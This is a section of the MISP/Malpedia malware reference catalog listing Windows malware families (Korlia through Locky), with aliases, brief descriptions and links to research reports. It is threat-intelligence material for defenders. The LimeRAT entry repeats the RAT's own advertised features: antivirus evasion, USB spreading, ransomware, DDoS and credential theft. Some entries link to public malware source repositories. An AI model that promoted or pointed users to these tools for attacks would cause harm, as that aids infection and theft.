https://web.archive.org/web/20160616170611/https://media.blackhat.com/bh-eu-10/presentations/Carrera_Silberman/BlackHat-EU-2010-Carrera-Silberman-State-of-Malware-slides.pdf

Korlia

The tag is: misp-galaxy:malpedia="Korlia"

Korlia is also known as:

Bisonal

Table 2083. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.korlia
https://unit42.paloaltonetworks.com/unit42-bisonal-malware-used-attacks-russia-south-korea/
https://securelist.com/cactuspete-apt-groups-updated-bisonal-backdoor/97962/
https://global.ahnlab.com/global/upload/download/asecreport/ASEC%20REPORT_vol.93_ENG.pdf
https://www.youtube.com/watch?v=_fstHQSK-kk
https://securitykitten.github.io/2014/11/25/curious-korlia.html
https://www.ptsecurity.com/upload/corporate/ww-en/pt-esc/winnti-2020-eng.pdf
http://asec.ahnlab.com/tag/Operation%20Bitter%20Biscuit
https://blog.talosintelligence.com/2020/03/bisonal-10-years-of-play.html
https://research.checkpoint.com/2020/vicious-panda-the-covid-campaign/
https://asec.ahnlab.com/1298
https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_3_takai_jp.pdf
https://www.secureworks.com/research/threat-profiles/bronze-huntley
https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html
https://www.ptsecurity.com/upload/corporate/ru-ru/pt-esc/winnti-2020-rus.pdf
https://web.archive.org/web/20130920120931/https:/www.rsaconference.com/writable/presentations/file_upload/cle-t04_final_v1.pdf
https://researchcenter.paloaltonetworks.com/2018/07/unit42-bisonal-malware-used-attacks-russia-south-korea/
https://www.ptsecurity.com/upload/corporate/ru-ru/webinars/ics/winnti-shadowpad.pdf
https://www.slideshare.net/StefanoMaccaglia/bsides-ir-in-heterogeneous-environment

Kovter

Kovter is a Police Ransomware

Feb 2012 - Police Ransomware Aug 2013 - Became AD Fraud Mar 2014 - Ransomware to AD Fraud malware June 2014 - Distributed from sweet orange exploit kit Dec 2014 - Run affiliated node Apr 2015 - Spread via fiesta and nuclear pack May 2015 - Kovter become fileless 2016 - Malvertising campaign on Chrome and Firefox June 2016 - Change in persistence July 2017 - Nemucod and Kovter was packed together Jan 2018 - Cyclance report on Persistence

The tag is: misp-galaxy:malpedia="Kovter"

Kovter is also known as:

Table 2084. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.kovter
https://www.symantec.com/connect/blogs/kovter-malware-learns-poweliks-persistent-fileless-registry-update
https://blog.malwarebytes.com/threat-analysis/2015/01/major-malvertising-campaign-hits-sites-with-combined-total-monthly-traffic-of-1-5bn-visitors/
https://blog.malwarebytes.com/threat-analysis/2016/07/untangling-kovter/
https://github.com/ewhitehats/kovterTools/blob/master/KovterWhitepaper.pdf
https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/
https://us-cert.cisa.gov/ncas/alerts/aa20-345a
https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/kovter-an-evolving-malware-gone-fileless
https://0x00sec.org/t/analyzing-modern-malware-techniques-part-1/18663
https://www.mcafee.com/blogs/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/

KPOT Stealer

The tag is: misp-galaxy:malpedia="KPOT Stealer"

KPOT Stealer is also known as:

Khalesi
Kpot

Table 2085. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.kpot_stealer
https://blog.ensilo.com/game-of-trojans-dissecting-khalesi-infostealer-malware
https://news.drweb.com/show/?i=13242&lng=en
https://www.flashpoint-intel.com/blog/malware-campaign-targets-jaxx-cryptocurrency-wallet-users/
https://isc.sans.edu/diary/25934
https://www.zdnet.com/article/revil-ransomware-gang-acquires-kpot-malware/
https://isc.sans.edu/diary/26010
https://www.proofpoint.com/us/threat-insight/post/new-kpot-v20-stealer-brings-zero-persistence-and-memory-features-silently-steal
https://umbrella.cisco.com/blog/navigating-cybersecurity-during-a-pandemic-latest-malware-and-threat-actors
https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf
https://blag.nullteilerfrei.de/2020/04/26/use-ghidra-to-decrypt-strings-of-kpotstealer-malware/
https://medium.com/s2wlab/deep-analysis-of-kpot-stealer-fb1d2be9c5dd
https://github.com/Dump-GUY/Malware-analysis-and-Reverse-engineering/blob/main/kpot2/KPOT.md
https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/

Kraken

The tag is: misp-galaxy:malpedia="Kraken"

Kraken is also known as:

Table 2086. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.kraken
https://www.bleepingcomputer.com/news/security/kraken-cryptor-ransomware-masquerading-as-superantispyware-security-program/
https://web.archive.org/web/20160616170611/https://media.blackhat.com/bh-eu-10/presentations/Carrera_Silberman/BlackHat-EU-2010-Carrera-Silberman-State-of-Malware-slides.pdf
https://securingtomorrow.mcafee.com/mcafee-labs/fallout-exploit-kit-releases-the-kraken-ransomware-on-its-victims/
https://www.recordedfuture.com/kraken-cryptor-ransomware/

KrBanker

The tag is: misp-galaxy:malpedia="KrBanker"

KrBanker is also known as:

BlackMoon

Table 2087. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.krbanker
https://www.peppermalware.com/2019/03/analysis-of-blackmoon-banking-trojans.html
http://researchcenter.paloaltonetworks.com/2016/05/unit42-krbanker-targets-south-korea-through-adware-and-exploit-kits-2/
https://www.proofpoint.com/us/threat-insight/post/Updated-Blackmoon-Banking-Trojan
https://zairon.wordpress.com/2014/04/15/trojan-banking-47d18761d46d8e7c4ad49cc575b0acc2bb3f49bb56a3d29fb1ec600447cb89a4/

KrDownloader

The tag is: misp-galaxy:malpedia="KrDownloader"

KrDownloader is also known as:

Table 2088. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.krdownloader

Kronos

The tag is: misp-galaxy:malpedia="Kronos"

Kronos is also known as:

Osiris

Table 2089. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.kronos
https://www.proofpoint.com/us/threat-insight/post/kronos-banking-trojan-used-to-deliver-new-point-of-sale-malware
https://www.zdnet.com/article/security-researcher-malwaretech-pleads-guilty/
https://vx-underground.org/archive/APTs/2017/2017.12.11/Money%20Taker.pdf
https://www.securonix.com/securonix-threat-research-kronos-osiris-banking-trojan-attack
https://www.proofpoint.com/us/threat-insight/post/kronos-reborn
https://blog.morphisec.com/long-live-osiris-banking-trojan-targets-german-ip-addresses
https://blog.malwarebytes.com/threat-analysis/2016/10/new-looking-sundown-ek-drops-smoke-loader-kronos-banker/
https://blog.trendmicro.com/trendlabs-security-intelligence/operation-black-atlas-endangers-in-store-card-payments-and-smbs-worldwide-switches-between-blackpos-and-other-tools/
https://research.checkpoint.com/deep-dive-upas-kit-vs-kronos/
https://dissectingmalwa.re/osiris-the-god-of-afterlifeand-banking-malware.html
https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree
https://blog.malwarebytes.com/cybercrime/2017/08/inside-kronos-malware-p2/
https://therecord.media/osiris-banking-trojan-shuts-down-as-new-ares-variant-emerges/
https://securityintelligence.com/the-father-of-zeus-kronos-malware-discovered/
https://twitter.com/3xp0rtblog/status/1294157781415743488
https://blog.malwarebytes.com/cybercrime/2017/08/inside-kronos-malware/
https://www.zscaler.com/blogs/security-research/ares-malware-grandson-kronos-banking-trojan

KryptoCibule

The tag is: misp-galaxy:malpedia="KryptoCibule"

KryptoCibule is also known as:

Table 2090. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.kryptocibule
https://www.welivesecurity.com/2020/09/02/kryptocibule-multitasking-multicurrency-cryptostealer/

KSL0T

A keylogger used by Turla.

The tag is: misp-galaxy:malpedia="KSL0T"

KSL0T is also known as:

Table 2091. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.ksl0t
https://0ffset.net/reverse-engineering/malware-analysis/analyzing-turlas-keylogger-1/
https://0ffset.net/reverse-engineering/malware-analysis/analyzing-turlas-keylogger-2/
https://0ffset.wordpress.com/2018/10/05/post-0x17-2-turla-keylogger/

Kuaibu

The tag is: misp-galaxy:malpedia="Kuaibu"

Kuaibu is also known as:

Barys
Gofot
Kuaibpy

Table 2092. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.kuaibu8

Kuluoz

The tag is: misp-galaxy:malpedia="Kuluoz"

Kuluoz is also known as:

Table 2093. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.kuluoz

Kurton

The tag is: misp-galaxy:malpedia="Kurton"

Kurton is also known as:

Table 2094. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.kurton
https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf

Kutaki

The tag is: misp-galaxy:malpedia="Kutaki"

Kutaki is also known as:

Table 2095. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.kutaki
https://cofense.com/kutaki-malware-bypasses-gateways-steal-users-credentials/

Kwampirs

Kwampirs is a family of malware which uses SMB to spread. It typically will not execute or deploy in environments in which there is no publicly available admin$ share. It is a fully featured backdoor which can download additional modules. Typical C2 traffic is over HTTP and includes "q=[ENCRYPTED DATA]" in the URI.

The tag is: misp-galaxy:malpedia="Kwampirs"

Kwampirs is also known as:

Table 2096. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.kwampirs
https://www.atlanticcouncil.org/wp-content/uploads/2020/07/Breaking-trust-Shades-of-crisis-across-an-insecure-software-supply-chain.pdf
http://www.documentcloud.org/documents/6821581-FLASH-CP-000111-MW-Downgraded-Version.html
https://blog.reversinglabs.com/blog/unpacking-kwampirs-rat
https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf
https://www.zdnet.com/article/fbi-re-sends-alert-about-supply-chain-attacks-for-the-third-time-in-three-months/
https://www.zdnet.com/article/fbi-warns-about-ongoing-attacks-against-software-supply-chain-companies/
https://www.securityartwork.es/2019/03/13/orangeworm-group-kwampirs-analysis-update/
https://www.symantec.com/blogs/threat-intelligence/orangeworm-targets-healthcare-us-europe-asia

LALALA Stealer

The tag is: misp-galaxy:malpedia="LALALA Stealer"

LALALA Stealer is also known as:

Table 2097. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.lalala_stealer
https://blog.prevailion.com/2020/03/the-curious-case-of-criminal-curriculum.html
https://securitynews.sonicwall.com/xmlpost/lalala-infostealer-which-comes-with-batch-and-powershell-scripting-combo/
https://twitter.com/luc4m/status/1276477397102145538
https://www.hornetsecurity.com/en/security-information/information-stealer-campaign-targeting-german-hr-contacts/

Lambert

The tag is: misp-galaxy:malpedia="Lambert"

Lambert is also known as:

Plexor

Table 2098. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.lambert
https://www.youtube.com/watch?v=jeLd-gw2bWo
https://ti.qianxin.com/blog/articles/network-weapons-of-cia/
https://www.symantec.com/connect/blogs/longhorn-tools-used-cyberespionage-group-linked-vault-7
https://securelist.com/blog/research/77990/unraveling-the-lamberts-toolkit/
https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf
https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=7ca2e331-2209-46a8-9e60-4cb83f9602de&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments

Lamdelin

The tag is: misp-galaxy:malpedia="Lamdelin"

Lamdelin is also known as:

Table 2099. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.lamdelin
http://news.thewindowsclub.com/poorly-coded-lamdelin-lockscreen-ransomware-alt-f4-88576/

LatentBot

The tag is: misp-galaxy:malpedia="LatentBot"

LatentBot is also known as:

Table 2100. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.latentbot
https://www.fireeye.com/blog/threat-research/2015/12/latentbot_trace_me.html
https://cys-centrum.com/ru/news/module_trojan_for_unauthorized_access
http://malware-traffic-analysis.net/2017/04/25/index.html
https://blog.malwarebytes.com/threat-analysis/2017/06/latentbot/
https://www.cert.pl/news/single/latentbot-modularny-i-silnie-zaciemniony-bot/

Laturo Stealer

The tag is: misp-galaxy:malpedia="Laturo Stealer"

Laturo Stealer is also known as:

Table 2101. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.laturo
https://seclists.org/snort/2019/q3/343

Laziok

The tag is: misp-galaxy:malpedia="Laziok"

Laziok is also known as:

Table 2102. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.laziok
https://www.symantec.com/connect/blogs/new-reconnaissance-threat-trojanlaziok-targets-energy-sector
https://www.mysonicwall.com/sonicalert/searchresults.aspx?ev=article&id=802

LazyCat

The tag is: misp-galaxy:malpedia="LazyCat"

LazyCat is also known as:

Table 2103. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.lazycat
https://www.microsoft.com/security/blog/2020/09/24/gadolinium-detecting-empires-cloud/
https://blog.yoroi.company/research/the-arsenal-behind-the-australian-parliament-hack/

LCPDot

The tag is: misp-galaxy:malpedia="LCPDot"

LCPDot is also known as:

Table 2104. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.lcpdot
https://blogs.jpcert.or.jp/en/2021/01/Lazarus_malware2.html
https://global.ahnlab.com/global/upload/download/asecreport/ASEC%20REPORT_vol.102_ENG%20(4).pdf

Leakthemall

Ransomware.

The tag is: misp-galaxy:malpedia="Leakthemall"

Leakthemall is also known as:

Table 2105. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.leakthemall
https://id-ransomware.blogspot.com/2020/09/leakthemall-ransomware.html

Leash

The tag is: misp-galaxy:malpedia="Leash"

Leash is also known as:

Table 2106. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.leash
https://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/

Leouncia

The tag is: misp-galaxy:malpedia="Leouncia"

Leouncia is also known as:

shoco

Table 2107. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.leouncia
https://www.fireeye.com/blog/threat-research/2010/12/leouncia-yet-another-backdoor-part-2.html
https://www.fireeye.com/blog/threat-research/2010/12/leouncia-yet-another-backdoor.html

Lethic

Lethic is a spambot dating back to 2008. It is known to be distributing low-level pharmaceutical spam.

The tag is: misp-galaxy:malpedia="Lethic"

Lethic is also known as:

Table 2108. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.lethic
http://www.malware-traffic-analysis.net/2017/11/02/index.html
http://www.vkremez.com/2017/11/lets-learn-lethic-spambot-survey-of.html
http://resources.infosecinstitute.com/win32lethic-botnet-analysis/

Liderc

The tag is: misp-galaxy:malpedia="Liderc"

Liderc is also known as:

Table 2109. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.liderc
https://about.fb.com/news/2021/07/taking-action-against-hackers-in-iran/
https://www.proofpoint.com/us/blog/threat-insight/i-knew-you-were-trouble-ta456-targets-defense-contractor-alluring-social-media
https://blog.talosintelligence.com/2019/09/tortoiseshell-fake-veterans.html

LightNeuron

The tag is: misp-galaxy:malpedia="LightNeuron"

LightNeuron is also known as:

NETTRANS
XTRANS

Table 2110. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.lightneuron
https://www.secureworks.com/research/threat-profiles/iron-hunter
https://www.welivesecurity.com/2020/03/12/tracking-turla-new-backdoor-armenian-watering-holes/
https://securelist.com/apt-trends-report-q2-2018/86487/
https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf
https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf
https://www.symantec.com/blogs/threat-intelligence/waterbug-espionage-governments
https://www.welivesecurity.com/wp-content/uploads/2019/05/ESET-LightNeuron.pdf
https://www.welivesecurity.com/2019/05/07/turla-lightneuron-email-too-far/

Ligsterac

The tag is: misp-galaxy:malpedia="Ligsterac"

Ligsterac is also known as:

Table 2111. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.ligsterac
https://securelist.com/atm-infector/74772/
http://atm.cybercrime-tracker.net/index.php

Lilith

The tag is: misp-galaxy:malpedia="Lilith"

Lilith is also known as:

Table 2112. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.lilith
https://blog.trendmicro.com/trendlabs-security-intelligence/operation-endtrade-finding-multi-stage-backdoors-that-tick/
https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/591/original/062521_SideCopy_%281%29.pdf
https://github.com/werkamsus/Lilith
https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/594/original/Network_IOCs_list_for_coverage.txt?1625657479
https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/592/original/Hashes_IOCs_for_coverage.txt

limedownloader

The tag is: misp-galaxy:malpedia="limedownloader"

limedownloader is also known as:

Table 2113. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.limedownloader
https://github.com/NYAN-x-CAT/Lime-Downloader

limeminer

The tag is: misp-galaxy:malpedia="limeminer"

limeminer is also known as:

Table 2114. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.limeminer
https://github.com/NYAN-x-CAT/Lime-Miner

LimeRAT

## Description
Simple yet powerful RAT for Windows machines. This project is simple and easy to understand, It should give you a general knowledge about dotNET malwares and how it behaves.

Main Features

.NET
Coded in Visual Basic .NET, Client required framework 2.0 or 4.0 dependency, And server is 4.0
Connection
Using pastebin.com as ip:port , Instead of noip.com DNS. And Also using multi-ports
Plugin
Using plugin system to decrease stub’s size and lower the AV detection
Encryption
The communication between server & client is encrypted with AES
Spreading
Infecting all files and folders on USB drivers
Bypass
Low AV detection and undetected startup method
Lightweight
Payload size is about 25 KB
Anti Virtual Machines
Uninstall itself if the machine is virtual to avoid scanning or analyzing
Ransomware
Encrypting files on all HHD and USB with .Lime extension
XMR Miner
High performance Monero CPU miner with user idle\active optimizations
DDoS
Creating a powerful DDOS attack to make an online service unavailable
Crypto Stealer
Stealing Cryptocurrency sensitive data
Screen-Locker
Prevents user from accessing their Windows GUI
And more
On Connect Auto Task
Force enable Windows RDP
Persistence
File manager
Passowrds stealer
Remote desktop
Bitcoin grabber
Downloader
Keylogger

The tag is: misp-galaxy:malpedia="LimeRAT"

LimeRAT is also known as:

Table 2115. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.limerat
https://www.trendmicro.com/en_us/research/21/i/Water-Basilisk-Uses-New-HCrypt-Variant-to-Flood-Victims-with-RAT-Payloads.html
https://blog.morphisec.com/tracking-hcrypt-an-active-crypter-as-a-service
https://github.com/NYAN-x-CAT/Lime-RAT/
https://www.youtube.com/watch?v=x-g-ZLeX8GM
https://blogs.juniper.net/en-us/threat-research/new-pastebin-like-service-used-in-multiple-malware-campaigns
https://blog.yoroi.company/research/limerat-spreads-in-the-wild/
https://lab52.io/blog/literature-lover-targeting-colombia-with-limerat/
https://blog.reversinglabs.com/blog/rats-in-the-library
https://lab52.io/blog/apt-c-36-recent-activity-analysis/
https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-american-entities-with-commodity-rats/BlindEagleIOCList.txt
https://www.trendmicro.com/en_us/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-ameri.html

Limitail

The tag is: misp-galaxy:malpedia="Limitail"

Limitail is also known as:

Table 2116. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.limitail

LinseningSvr

The tag is: misp-galaxy:malpedia="LinseningSvr"

LinseningSvr is also known as:

Table 2117. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.linseningsvr
https://www.secureworks.com/research/analysis-of-dhs-nccic-indicators

Listrix

The tag is: misp-galaxy:malpedia="Listrix"

Listrix is also known as:

Table 2118. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.listrix
https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group
https://symantec-blogs.broadcom.com/blogs/threat-intelligence/dragonfly-energy-sector-cyber-attacks

LiteDuke

According to CarbonBlack, LiteDuke is a third stage backdoor. It appears to use the same dropper as PolyglotDuke. Its payload makes use of an AES encrypted SQLite database to store its configuration. LiteDuke supports a large number of individual commands including host information retrieval, file upload and download, and the ability to execute other code. LiteDuke C2 servers appear to be compromised servers, and the malware communicates with them using normal HTTP requests. It attempts to use a realistic User-Agent string to blend in better with normal HTTP traffic. ESET have dubbed it LiteDuke because it uses SQLite to store information such as its configuration.

The tag is: misp-galaxy:malpedia="LiteDuke"

LiteDuke is also known as:

Table 2119. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.liteduke
https://norfolkinfosec.com/looking-back-at-liteduke/
https://www.carbonblack.com/2020/03/26/the-dukes-of-moscow/

LiteHTTP

According to AlienVault, LiteHTTP bot is a new HTTP bot programmed in C#. The bot has the ability to collect system information, download and execute programs, and update and kill other bots present on the system.

The source is on GitHub: https://github.com/zettabithf/LiteHTTP

The tag is: misp-galaxy:malpedia="LiteHTTP"

LiteHTTP is also known as:

Table 2120. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.litehttp
https://github.com/zettabithf/LiteHTTP
https://viriback.com/recent-litehttp-activities-and-iocs/
https://malware.news/t/recent-litehttp-activities-and-iocs/21053

LockBit

The tag is: misp-galaxy:malpedia="LockBit"

LockBit is also known as:

ABCD Ransomware

Table 2121. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.lockbit
https://seguranca-informatica.pt/malware-analysis-details-on-lockbit-ransomware/
https://unit42.paloaltonetworks.com/emerging-ransomware-groups/
https://www.trendmicro.com/en_us/research/21/h/lockbit-resurfaces-with-version-2-0-ransomware-detections-in-chi.html
https://yoroi.company/research/hunting-the-lockbit-gangs-exfiltration-infrastructures/
https://www.coveware.com/blog/ransomware-attack-vectors-shift-as-new-software-vulnerability-exploits-abound
https://id-ransomware.blogspot.com/search?q=lockbit
https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf
https://medium.com/s2wlab/w4-jan-en-story-of-the-week-ransomware-on-the-darkweb-7595544363b1
https://blog.cyble.com/2021/08/16/a-deep-dive-analysis-of-lockbit-2-0/
https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3
https://www.netskope.com/blog/netskope-threat-coverage-lockbit
https://www.bleepingcomputer.com/news/security/lockbit-ransomware-now-encrypts-windows-domains-using-group-policies/
https://github.com/albertzsigovits/malware-notes/blob/master/Ransomware/Lockbit.md
https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1
https://therecord.media/an-interview-with-blackmatter-a-new-ransomware-group-thats-learning-from-the-mistakes-of-darkside-and-revil/
https://www.crypsisgroup.com/insights/ransomwares-new-trend-exfiltration-and-extortion
https://medium.com/s2wlab/w4-july-en-story-of-the-week-ransomware-on-the-darkweb-c61965d0386a
https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/
https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf
https://therecord.media/australian-cybersecurity-agency-warns-of-spike-in-lockbit-ransomware-attacks/
https://www.prodaft.com/m/reports/LockBit_Case_Report_TLPWHITE.pdf[https://www.prodaft.com/m/reports/LockBit_Case_Report_TLPWHITE.pdf]
https://www.bleepingcomputer.com/news/security/popular-russian-hacking-forum-xss-bans-all-ransomware-topics/
https://www.bleepingcomputer.com/news/security/uk-rail-network-merseyrail-likely-hit-by-lockbit-ransomware/
https://securityintelligence.com/posts/lockbit-ransomware-attacks-surge-affiliate-recruitment/
https://www.advanced-intel.com/post/from-russia-with-lockbit-ransomware-inside-look-preventive-solutions
https://analyst1.com/file-assets/RANSOM-MAFIA-ANALYSIS-OF-THE-WORLD%E2%80%99S-FIRST-RANSOMWARE-CARTEL.pdf
https://ke-la.com/zooming-into-darknet-threats-targeting-jp-orgs-kela/
https://www.recordedfuture.com/blackmatter-ransomware-successor-darkside-revil/
https://news.sophos.com/en-us/2020/04/24/lockbit-ransomware-borrows-tricks-to-keep-up-with-revil-and-maze/
https://medium.com/@amgedwageh/lockbit-ransomware-analysis-notes-93a542fc8511
https://analyst1.com/blog/ransom-mafia-analysis-of-the-worlds-first-ransomware-cartel
https://talos-intelligence-site.s3.amazonaws.com/production/document_files/files/000/095/481/original/010421_LockBit_Interview.pdf
https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/
https://www.bleepingcomputer.com/news/security/ransomware-attack-hits-italys-lazio-region-affects-covid-19-site/
https://www.bleepingcomputer.com/news/security/lockbit-ransomware-recruiting-insiders-to-breach-corporate-networks/
https://blog.lexfo.fr/lockbit-malware.html
https://blog.talosintelligence.com/2020/09/CTIR-quarterly-trends-Q4-2020.html
https://therecord.media/missed-opportunity-bug-in-lockbit-ransomware-allowed-free-decryptions/
https://www.zdnet.com/article/ransomware-hits-helicopter-maker-kopter/
https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/
https://news.sophos.com/en-us/2020/10/21/lockbit-attackers-uses-automated-attack-tools-to-identify-tasty-targets
https://www.bleepingcomputer.com/news/security/energy-group-erg-reports-minor-disruptions-after-ransomware-attack/

LockerGoga

According to Trend Micro, LockerGoga is a ransomware that has been used in multiple attacks, most notably against Altran Technologies and Norsk Hydro. It encrypts a range of documents and source code files but certain versions had little to no whitelist that would protect import system files such as the Windows Boot Manager.

The tag is: misp-galaxy:malpedia="LockerGoga"

LockerGoga is also known as:

Table 2122. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.lockergoga
https://www.nrk.no/norge/skreddersydd-dobbeltangrep-mot-hydro-1.14480202
https://www.govcert.admin.ch/blog/36/severe-ransomware-attacks-against-swiss-smes
https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf
https://dragos.com/wp-content/uploads/Spyware-Stealer-Locker-Wiper-LockerGoga-Revisited.pdf
https://www.abuse.io/lockergoga.txt
https://www.fireeye.com/blog/threat-research/2020/07/financially-motivated-actors-are-expanding-access-into-ot.html
https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html
https://content.fireeye.com/m-trends/rpt-m-trends-2020
https://www.bleepingcomputer.com/news/security/fbi-issues-alert-for-lockergoga-and-megacortex-ransomware/
https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf
https://doublepulsar.com/how-lockergoga-took-down-hydro-ransomware-used-in-targeted-attacks-aimed-at-big-business-c666551f5880
https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf
https://www.youtube.com/watch?v=o6eEN0mUakM
https://www.mcafee.com/blogs/other-blogs/mcafee-labs/csi-evidence-indicators-for-targeted-ransomware-attacks-part-ii/
https://www.helpnetsecurity.com/2019/04/02/aurora-decrypter-mira-decrypter/
https://www.bleepingcomputer.com/news/security/new-lockergoga-ransomware-allegedly-used-in-altran-attack/
https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/

LockFile

A ransomware first observed in July 2021.

The tag is: misp-galaxy:malpedia="LockFile"

LockFile is also known as:

Table 2123. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.lockfile
https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/lockfile-ransomware-new-petitpotam-windows
https://news.sophos.com/en-us/2021/08/27/lockfile-ransomwares-box-of-tricks-intermittent-encryption-and-evasion/
https://blog.cyble.com/2021/08/25/lockfile-ransomware-using-proxyshell-attack-to-deploy-ransomware/
https://twitter.com/VirITeXplorer/status/1428750497872232459
https://www.csoonline.com/article/3631517/lockfile-ransomware-uses-intermittent-encryption-to-evade-detection.html
https://thehackernews.com/2021/08/lockfile-ransomware-bypasses-protection.html

Locky

Locky is a high profile ransomware family that first appeared in early 2016 and was observed being active until end of 2017. It encrypts files on the victim system and asks for ransom in order to have back original files. In its first version it added a .locky extension to the encrypted files, and in recent versions it added the .lukitus extension. The ransom amount is defined in BTC and depends on the actor.

The tag is: misp-galaxy:malpedia="Locky"

Locky is also known as:

Table 2124. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.locky
http://securityaffairs.co/wordpress/49094/malware/zepto-ransomware.html
https://blog.malwarebytes.com/threat-analysis/2016/03/look-into-locky/
https://www.bleepingcomputer.com/news/security/locky-ransomware-returns-but-targets-only-windows-xp-and-vista/
https://dissectingmalwa.re/picking-locky.html
https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/
http://blog.talosintelligence.com/2017/06/necurs-locky-campaign.html
https://thisissecurity.stormshield.com/2018/03/20/de-obfuscating-jump-chains-with-binary-ninja/
http://web.archive.org/web/20181007211751/https://myonlinesecurity.co.uk/return-of-fake-ups-cannot-deliver-malspam-with-an-updated-nemucod-ransomware-and-kovter-payload/
https://blog.botfrei.de/2017/08/weltweite-spamwelle-verbreitet-teufliche-variante-des-locky/
https://www.elastic.co/blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
https://threatpost.com/ransomware-gang-arrested-locky-hospitals/155842/
https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/
https://www.mcafee.com/blogs/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/
https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf
